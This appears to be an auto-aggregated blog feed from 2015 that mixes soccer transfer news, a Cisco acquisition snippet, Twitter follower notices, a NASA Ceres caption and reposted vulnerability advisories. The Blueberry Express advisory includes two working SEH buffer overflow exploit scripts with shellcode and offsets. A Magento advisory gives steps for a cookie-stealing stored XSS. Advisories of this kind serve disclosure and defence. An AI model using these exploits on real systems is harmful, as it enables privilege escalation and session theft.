Cisco to Buy OpenDNS Company for $635 Million

Cisco, a networking giant that offers traditional network edge protection, has announced that the company is buying cloud-based security company OpenDNS for $635 Million. Yes, OpenDNS, whose Domain Name Services (DNS) you might have used to avoid regional restrictions or to improve your Internet connection. However, Cisco is not making the acquisition of OpenDNS for any of the above


from The Hacker News http://ift.tt/1IsDkzN
via IFTTT

Petr Cech: Arsenal matches my ambition to win trophies

PRAGUE (AP) Petr Cech says it was the hardest decision of his career to agree on a transfer from Chelsea following 11 successful years to English Premier League rival Arsenal.

from FOX Sports Digital http://ift.tt/1GYSTwN
via IFTTT

Liverpool signs England defender Clyne from Southampton

LIVERPOOL, England (AP) England defender Nathaniel Clyne has become the fourth player to join Liverpool from Southampton in the past year after signing for a reported fee of 12.5 million pounds ($19.7 million).

from FOX Sports Digital http://ift.tt/1GYSTgz
via IFTTT

Ivory Coast names 5 candidates for new coach

ABIDJAN, Ivory Coast (AP) The Ivory Coast Football Federation has named Michel Dussuyer and Henry Kasperczak in a list of five candidates for new coach of the African champion.

from FOX Sports Digital http://ift.tt/1Ju5t8d
via IFTTT

Monaco signs France U21 midfielder Bahlouli on 5-year deal

MONACO (AP) Monaco has signed France Under-21 attacking midfielder Fares Bahlouli from Lyon on a five-year contract.

from FOX Sports Digital http://ift.tt/1NvbPWz
via IFTTT

Bayern Munich signs Brazil midielder Douglas Costa

MUNICH (AP) Bayern Munich has signed Brazil midfielder Douglas Costa from Ukrainian side Shakhtar Donetsk.

from FOX Sports Digital http://ift.tt/1Nv9QS5
via IFTTT

France to host Germany in November friendly

PARIS (AP) France will host Germany in November in a friendly at the Stade de France as part of its preparations for the 2016 European Championship.

from FOX Sports Digital http://ift.tt/1C8Dag0
via IFTTT

Colombian striker Martinez moves to Atletico Madrid

LISBON, Portugal (AP) Atletico Madrid is paying 35 million euros ($39 million) to bring Colombia international Jackson Martinez from FC Porto.

from FOX Sports Digital http://ift.tt/1FQrQ2R
via IFTTT

I have a new follower on Twitter


Norman
Marketing Manager for @my1login by day and night. In my spare time I'm @paddlescotland. My brilliant wee nephew in the pic!
Scotland
http://t.co/KFhJlG0YgD
Following: 9630 - Followers: 9893

July 01, 2015 at 06:14AM via Twitter http://twitter.com/NormanM1L

[FD] Blueberry Express v5.9.x - SEH Buffer Overflow Vulnerability

Document Title: =============== Blueberry Express v5.9.x - SEH Buffer Overflow Vulnerability References (Source): ==================== http://ift.tt/1U0Avuk Video: http://ift.tt/1Ly7jHv Release Date: ============= 2015-06-29 Vulnerability Laboratory ID (VL-ID): ==================================== 1535 Common Vulnerability Scoring System: ==================================== 6.4 Product & Service Introduction: =============================== Create engaging movies by adding text, sound and images to your screen recording. Make sure your audience doesn`t miss a thing with easy-to-use Zoom-Pan and AutoScroll effects. Create polished tutorials and presentations with the help of powerful editing functions. Do it the easy way with BB FlashBack screen recorder. Its never been easier for everyone to see your movies. BB FlashBack screen recorder shares with FlashBack Connect or Youtube to display your movies on all devices.(FlashBack Connect is currently in Beta, and available only to Pro and Standard edition purchasers). (Copy of the Vendor Homepage: http://ift.tt/1iDTUMM ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a local seh buffer overflow vulnerability in the official Blueberry Express v5.9.0.3678 software. Vulnerability Disclosure Timeline: ================================== 2015-06-29: Researcher Notification & Coordination (Ateeq Khan) Discovery Status: ================= Published Affected Product(s): ==================== Blueberry Software Product: Blueberry Express - Software 5.9.0.3678 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local SEH Buffer Overflow vulnerability has been discovered in the official Blueberry Express v5.9.0.3678 software. The vulnerability allows local or remote attacker to gain higher system or access privileges by exploitation of a classic seh buffer overflow vulnerability. The local SEH Buffer Overflow affects multiple products including the BBFlashBack Recorder, Batch Export etc. Other products using similar modules might also be affected. The vulnerability can be exploited by local attackers with low privilege system user account. The attacker vector of the issue is server-side and the request method to execute the shellcode is local. The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Successful exploitation of this vulnerability results in complete compromise of the affected machine and system process. Proof of Concept (PoC): ======================= The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. POC Description: For POC, the researcher installed the software with admin privileges on a windows system (allowed to run for all users), while application still running in the background, logged off and logged in with a different (low privileged) user. Exploited the vulnerability successfully hence giving the researcher a system shell with elevated admin privileges. Privilege escalation is possible in this scenario. Malwares wont be able to exploit this vulnerability remotely as this is a Local exploit. Manual steps to reproduce the vulnerability ... 1) Run BB Flashback Express Recorder 2) Goto TOOLS > OPTIONS > MISC 3) Click on "Use custom folder" under the Temp Folder module 4) Copy / Paste the POC binary code (record.txt) into the input field of custom folder 5) Click OK Note: Calculator should popup hence proving the existence of this vulnerability PoC: Exploitcode # Exploit Title: Blueberry Express Recorder SEH based buffer overflow (Local) Exploit # Discovered by: Ateeq Khan - @ohtheITguy (http://ift.tt/1jnqRwA) # Windows Calc.exe Shellcode - Metasploit shellcode = ("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3" "\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c" "\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36" "\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f" "\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c" "\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1" "\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69" "\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55" "\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4" "\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2" "\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6" "\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25" "\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80" "\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6" "\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79") push="\x90" * 288 # Starting offset nseh="\xeb\x06\x90\x90" # Short jump seh="\xf3\x43\x10\x40" # POP/POP/RET - [vcl60.bpl] [NoSafeSEH] nopsled="\x90" * 30 # NOPsled print "Creating expoit file" f=open("recorder.txt","w") try: f.write(push+nseh+seh+nopsled+shellcode) f.close() print "File created" except: print "File cannot be created" PoC#2: Exploitcode # Exploit Title: Blueberry Express Batch Export SEH based buffer overflow (Local) # Discovered by: Ateeq Khan - @ohtheITguy (http://ift.tt/1jnqRwA) print "Creating expoit file" f=open("batch.txt","w") #Create the file # Windows Calc.exe Shellcode - Metasploit shellcode = ("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3" "\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c" "\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36" "\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f" "\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c" "\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1" "\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69" "\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55" "\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4" "\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2" "\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6" "\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25" "\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80" "\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6" "\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79") push="\x90" * 6596 # Starting offset nseh="\xeb\x06\x90\x90" # Short jump seh="\xf3\x43\x10\x40" # POP/POP/RET - [vcl60.bpl] [NoSafeSEH] nopsled="\x90" * 30 # NOPsled try: f.write(push+nseh+seh+nopsled+shellcode) f.close() print "File created" except: print "File cannot be created" Reference(s): http://ift.tt/LqNi9y http://ift.tt/1rwwez3 Security Risk: ============== The security risk of the local seh buffer overflow software vulnerability is estimated as high. (CVSS 6.4) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Ateeq Khan (Ateeq@evolution-sec.com) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] FCS Scanner v1.0 & v1.4 iOS - Command Inject Vulnerability

[FD] Ebay Magento Bug Bounty #14 - Persistent Description Vulnerability

Document Title: =============== Ebay Magento Bug Bounty #14 - Persistent Description Vulnerability References (Source): ==================== http://ift.tt/1U3OHTo EIBBP-31602 Release Date: ============= 2015-06-30 Vulnerability Laboratory ID (VL-ID): ==================================== 1463 Common Vulnerability Scoring System: ==================================== 3.8 Product & Service Introduction: =============================== Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites. Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away. ( Copy of the Vendor Homepage: http://ift.tt/1E22539 & http://ift.tt/1E22539 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered an application-side cross site scripting web vulnerabilityin the Magento Commerce web-application. Vulnerability Disclosure Timeline: ================================== 2015-03-17: Researcher Notification & Coordination (Hadji Samir) 2015-03-18: Vendor Notification (eBay Inc Security Team - Bug Bounty Program) 2015-04-03: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program) 2015-05-16: Vendor Fix/Patch (Magento Developer Team) 2015-06-30: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Magento - Connect Web Application 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An application-side cross site scripting web vulnerability has been discovered in the official Magento Connect web-application. The vulnerability allows remote attackers to inject own script code to the application-side of the affected application module. Remote attackers are able to inject own script code to the url description link input of the send message module in magento-connect. Remote attackers are able to inject in the profile description url own script code to compromise user/moderator/admin session data. The request method to inject is POSt and the attack vector is located on the application-side of the affected module. The security risk of the application-side cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the persistent input validation web vulnerability requires a low privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules (api). Vulnerable Service(s): [+] Magento Connect Vulnerable Module(s): [+] send message magento-connect Vulnerable Parameter(s): [+] url link description Proof of Concept (PoC): ======================= The application-side vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the security vulnerability ... 1. Register an magento account 2. Login to the service 3. Surf to the profile service 4. Inject own script code payload with document.cookie/domain request to the url description input field 5. Save the input 6. The script code execution occurs in the next layer were the input is visible as profile 7. Successful reproduce of the security vulnerability! POC: Exploitcode (js)

Source: Gmail -> IFTTT-> Blogger

[FD] Pinterest Bug Bounty #1 - Persistent contact_name Vulnerability

Collision again raises issue of concussions in World Cup

MONTREAL (AP) Germany coach Silvia Neid said forward Alexandra Popp did not have a concussion after banging heads with U.S. midfielder Morgan Brian in the first half of the women's World Cup semifinal.

from FOX Sports Digital http://ift.tt/1GLMfXv
via IFTTT

An Unusual Mountain on Asteroid Ceres


What created this large mountain on asteroid Ceres? No one is yet sure. As if in anticipation of today being Asteroid Day on Earth, the robotic spacecraft Dawn in orbit around Ceres took the best yet image of an unusually tall mountain on the Asteroid Belt's largest asteroid. Visible at the top of the featured image, the exceptional mountain rises about five kilometers up from an area that otherwise appears pretty level. The image was taken about two weeks ago from about 4,400 kilometers away. Although origin hypotheses for the mountain include volcanism, impacts, and plate tectonics, clear evidence backing any of these is currently lacking. Also visible across Ceres' surface are some enigmatic light areas: bright spots whose origin and composition that also remain an active topic of investigation. Even though Dawn is expected to continue to orbit Ceres, officially dubbed a dwarf planet, for millions of years, the hydrazine fuel used to point Dawn's communications antenna toward Earth is expected to run out sometime next year. via NASA http://ift.tt/1U2H5k3

Wanderers sign former Barcelona youth product

SYDNEY (AP) Western Sydney Wanderers have signed former Barcelona youth player Andreu Guerao Mayoral for the next A-League season.

from FOX Sports Digital http://ift.tt/1GLvqvY
via IFTTT

Tuesday, June 30, 2015

I have a new follower on Twitter


Mary


http://t.co/XZdolcjITH
Following: 1829 - Followers: 1282

June 30, 2015 at 11:38PM via Twitter http://twitter.com/3000Sweden